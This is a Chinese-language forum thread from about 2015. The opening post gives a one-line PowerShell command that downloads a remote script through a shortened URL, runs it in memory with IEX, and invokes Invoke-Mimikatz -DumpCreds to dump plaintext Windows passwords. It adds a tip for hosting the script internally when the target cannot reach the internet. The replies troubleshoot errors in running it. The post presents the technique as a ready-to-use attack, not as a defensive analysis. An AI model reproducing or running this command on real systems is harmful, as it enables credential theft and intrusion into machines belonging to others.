一句powershell调用mimikatz抓密码

admin · 发表于 2015-7-30 21:42:42

mimikatz神器大家都知道吧，可以抓取系统内的明文密码，但是平时我们测试的时候需要把mimikatz的几个文件上传到目标系统上面，然后再手工执行几个命令才能搞定，今天无意访问一个大神的博客，发现其实可以利用powershell一句话搞定，是国外大神的方法。

国外大神clymb3r写的一个powershell脚本将mimikatz注入到内存调用logonPasswords获取密码，使用起来相当轻便。

以管理员权限启动CMD执行下以命令即可：

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

复制代码

实战中如果机器不能上外网可以将脚本下载回来放到内网的web service上。

显示全部楼层 · 发表于 2016-2-1 11:50:20

好方法，谢分享

显示全部楼层 · 发表于 2016-2-1 22:07:17

不过测试了下在我的win7 x64的cmd下运行出错，一大堆的错误

Jumbo · 发表于 2016-2-1 23:11:44

success95 发表于 2016-2-1 22:07
不过测试了下在我的win7 x64的cmd下运行出错，一大堆的错误

是已管理员权限运行的吗，而且国内有时访问不了命令中的url（github）

显示全部楼层 · 发表于 2016-2-6 20:45:25

Jumbo 发表于 2016-2-1 23:11
是已管理员权限运行的吗，而且国内有时访问不了命令中的url（github）

绝对是管理员运行的。但就是出错了，执行没有mimikatz的页面